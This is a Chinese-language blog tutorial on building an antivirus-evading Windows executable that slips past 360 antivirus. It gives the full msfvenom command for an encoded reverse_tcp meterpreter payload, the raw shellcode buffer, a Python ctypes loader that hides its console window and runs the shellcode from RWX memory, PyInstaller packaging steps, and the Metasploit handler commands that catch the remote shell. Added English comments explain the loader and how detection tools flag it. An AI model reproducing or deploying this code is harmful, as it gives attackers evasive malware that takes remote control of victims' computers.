  • Metasploit+python生成免杀exe过360杀毒

    Metasploit+python生成免杀exe360杀毒

    1在kali下生成一个反弹的msf的python脚本,命令如下:

    msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.1.102  -e x86/shikata_ga_nai -i 11 -f py -o  /opt/bk.py

    2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变)

    from ctypes import *
    
    import ctypes
    
    # Payload bytes as emitted by the msfvenom command in step 1 (-f py):
    # one string literal per line, concatenated into `buf`. Nothing in this
    # script inspects these bytes; they are only copied into memory and
    # executed further down.
    buf =  ""
    
    buf += "xbbx7ax62x0ax22xdbxc9xd9x74x24xf4x58x29"
    
    buf += "xc9xb1x97x31x58x15x03x58x15x83xe8xfcxe2"
    
    buf += "x8fxdcx50xbcx22x5dxbfx0cx65xe9x1bx79xcd"
    
    buf += "x39xadx30x7cx0cx5dx21xfdx87x61x46x2bxc8"
    
    buf += "x35xc0x38x81xbfxd5xb9xd7x14x0cxcbx00x79"
    
    buf += "x12x5dxd0xb1xeexfex06x1dx51x8ax92x29xd2"
    
    buf += "xa4x4cxd0x08x22xdcx4fx24xb2x2bx2bxdax00"
    
    buf += "x5fxa3x1dx01xfexe9xf2x62xebxa7x46x63xce"
    
    buf += "xacx45xe4x8bxa1xa3x85x14xe1x1ex06xa7x6e"
    
    buf += "x7ax03xe7x05xd2x41x32x24x3cx48x72xf2x57"
    
    buf += "x0fx58x58x5cxf6xd5x0fx5bx6bxcax34xddx5d"
    
    buf += "xe0x62x5axc2xdex3dxdcxb3xf0x3ex78x31x90"
    
    buf += "x6cx5fx58xeex84xb0x30x87x60xecx58x25xad"
    
    buf += "x4ax6bxc6xb7xd8x70xb8x2fxc8xd9xcfxecx10"
    
    buf += "xcbx67x90xf2xdfxf2x4axf3x23xf6xd1x12xa5"
    
    buf += "xfbx10xa9x56x4exd0xdcx10x21x1dxb5x58x17"
    
    buf += "xe1x6dx69x74xc7xacx58x1axc9xf7x00xf8x54"
    
    buf += "x76x05x6dxd4x9ex9cx22xdbx0fxa9xfaxe3x8b"
    
    buf += "x8ex1ax1fx60xdbxbexefx2fx73xa5x42x02x93"
    
    buf += "x89x0fx42xfaxaexb9x9bxecxe2x53x56x38x51"
    
    buf += "x45x6fxb8xd2xffx3ax73x44xe4x38x38xf2x28"
    
    buf += "x76xf0xcax34x80x35x55x83xadx29x23x8axca"
    
    buf += "x07xcfx88x30x15x2exc0x99x1exddxb6xbbx49"
    
    buf += "x92x1ex9axddxcfx58xe9x84x66x3dx38xfcx28"
    
    buf += "x99xa4x19x09xe6x1cxf5xadx4fxa1x81xbfx51"
    
    buf += "x3dx0bx9ex27x60x20x7dx59x6ex82x7cx25x5c"
    
    buf += "x4ex34x25xedxc3xb1x45x02x92x75xf5x11xa5"
    
    buf += "x54xdcx1bx6fx9bx56xd2xb5x80x66xcfxe1x61"
    
    buf += "xd1x01xe4x31x52xd9x5bx01x37x29xa8xefxc8"
    
    buf += "x53x9bx1cx47x30x9exe4x6axdaxb3xd5xfdxf5"
    
    buf += "xb8x13xbcx92xbbxb4x82x70x02xadxefx3bx70"
    
    buf += "xf4x98x84x31x52x97x60x2bx2ex84x9bx7fxb7"
    
    buf += "x30x85x58xefx8cx95xa0x56x2fxefx20x61x0d"
    
    buf += "x94x66xbfxa7xd0x71x56x52x82xb1xa0x19xe4"
    
    buf += "x7exd9x90x96x2bx16xeax4cxdexcdx05x23x6e"
    
    buf += "xc2x4bxc0x68x1bxbaxc1x1dxcax26x74xd1x92"
    
    buf += "x4exd3x70x8ax43x41xbex59xf1x20x33x89xb9"
    
    buf += "x2bxdbx9ax0fxadx8dx80x4cx78x52xe7x0axf7"
    
    buf += "x47xd8x5cx0cx3cxd4x0dx3dxe7xbdx2dx22xb1"
    
    buf += "x37x0axd9x5exf2xd5xd2x56xe0x56x1cx42xc3"
    
    buf += "x75x92x55x7cx86x6axb4xcdx3axcex4dxeax4f"
    
    buf += "xa4x31xc6xe0x16x27xa5xf4x9dx79x5exfcx60"
    
    buf += "xebxefx35x33x6ex5bx6dxecx8fx9bx1exb1xf6"
    
    buf += "x35xebx1fx3bxabx99x9ax34x2axf8x25x38xba"
    
    buf += "x40xe9xb0x51xbcxdfx60x16x62xc3x63x64xbd"
    
    buf += "xb5x28xf6x4cx71xd2x01x74x11xf0xd7xcdx4f"
    
    buf += "x34xadxc2x65x4cxebx78xc1xbfxbax80x6cx46"
    
    buf += "x6ax15x15x03x5ex8dx65x8ex69x89x29x7fx67"
    
    buf += "xeaxc1x6bx62xb0xd4"
    
     
    
    # Left commented out, so the module-level name `libc` that
    # executable_code() reads is never bound in this script.
    #libc = CDLL('libc.so.6')
    
    # POSIX mprotect() protection bits; only referenced by executable_code(),
    # which the Windows path below never calls.
    PROT_READ = 1
    
    PROT_WRITE = 2
    
    PROT_EXEC = 4
    
    def executable_code(buffer):
        """Unused POSIX-style loader (valloc + mprotect); never called in this script.

        Copies `buffer` into a freshly valloc'd region, marks that region
        readable, writable and executable, and returns the region address.
        It reads the module-level name `libc`, whose definition is commented
        out above, so calling it would raise NameError. The Windows path
        further down uses VirtualAlloc/VirtualProtect instead.

        Raises:
            Exception: if mprotect() reports failure (see note on the
                allocation check below).
        """
    
        buf = c_char_p(buffer)
    
        size = len(buffer)
    
        addr = libc.valloc(size)
    
        addr = c_void_p(addr)
    
        # NOTE(review): `addr` is a c_void_p instance at this point, so
        # `0 == addr` is always False and a NULL return from valloc() is
        # never detected here.
        if 0 == addr: 
    
            raise Exception("Failed to allocate memory")
    
        memmove(addr, buf, size)
    
        # PROT_READ | PROT_WRITE | PROT_EXEC == 7: the region becomes RWX.
        if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
    
            raise Exception("Failed to set protection on buffer")
    
        return addr
    
    # --- Windows self-injection path -------------------------------------
    # Detection note: everything below is the textbook in-process shellcode
    # loader -- an RWX allocation (VirtualAlloc / VirtualProtect with
    # PAGE_EXECUTE_READWRITE), a copy of the payload into it (RtlMoveMemory)
    # and an indirect call into that region -- issued from a python.exe or
    # PyInstaller-bundled process. That API-call sequence and the resulting
    # private RWX region are what EDR telemetry and memory scanners key on;
    # the no-op filler statements in between do not alter that behaviour.
    #
    # Aliases for the two kernel32 exports. The VirtualAlloc alias is not
    # actually used below (the fully qualified name is called instead).
    VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
    
    VirtualProtect = ctypes.windll.kernel32.VirtualProtect
    
    # Python 2: bytearray(str) yields the raw payload bytes.
    shellcode = bytearray(buf)
    
    # Hide the console window, if the process has one.
    whnd = ctypes.windll.kernel32.GetConsoleWindow()   
    
    if whnd != 0:
    
           # Always-true guard; it has no functional effect.
           if 666==666:
    
                  # nCmdShow 0 is SW_HIDE.
                  ctypes.windll.user32.ShowWindow(whnd, 0)   
    
                  # An HWND is not a kernel object handle, so this CloseHandle
                  # call presumably just fails; its return value is ignored.
                  ctypes.windll.kernel32.CloseHandle(whnd)
    
    # Prints a long run of dots; no functional effect (Python 2 print).
    print ".................................."*666
    
    # VirtualAlloc(NULL, len(shellcode), MEM_COMMIT | MEM_RESERVE (0x3000),
    # PAGE_EXECUTE_READWRITE (0x40)): the region is RWX from the start.
    # No restype/argtypes are declared, so the returned pointer is handled
    # as a plain C int; the post targets 32-bit Windows (step 3).
    memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    
                                              ctypes.c_int(len(shellcode)),
    
                                              ctypes.c_int(0x3000),
    
                                              ctypes.c_int(0x40))
    
    # c_char array aliasing the bytearray's storage (no copy).
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    
    old = ctypes.c_long(1)
    
    # Redundant: the region was already allocated PAGE_EXECUTE_READWRITE.
    # The previous protection is written into `old` and then ignored.
    VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
    
    # Copy the payload bytes into the RWX region.
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
    
                                         buf,
    
                                         ctypes.c_int(len(shellcode)))
    
    # Reinterpret the region address as a C function taking no arguments.
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    
    print "Code By Luan"
    
    # Calls into the region, handing control to the copied payload.
    shell()

    3.在windowsx86上安装支持python的环境,下载pywin32 解压运行,一直点下一步就可以了

    4.然后下载支持将python生成exe的软件pyinstall ,解压然后执行以下命令:

    D:\miansha\pyinstaller-2.0>python PyInstaller.py --console --onefile  bk.py

    注意这里不要有中文路径,否则会出错

    5.执行命令后会在d:\pyinstaller-2.0\bk\dist目录生成bk.exe

     

    6.这里我将在windowsx86上安装最新的360杀毒软件,进行查杀测试

     

    7.然后在kali下启动msf,然后执行以下命令:

    use exploit/multi/handler
    
    set lhost 192.168.1.102
    
    set lport 443
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    exploit

    8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterpreter 出来:

  • 原文地址:https://www.cnblogs.com/backlion/p/6785870.html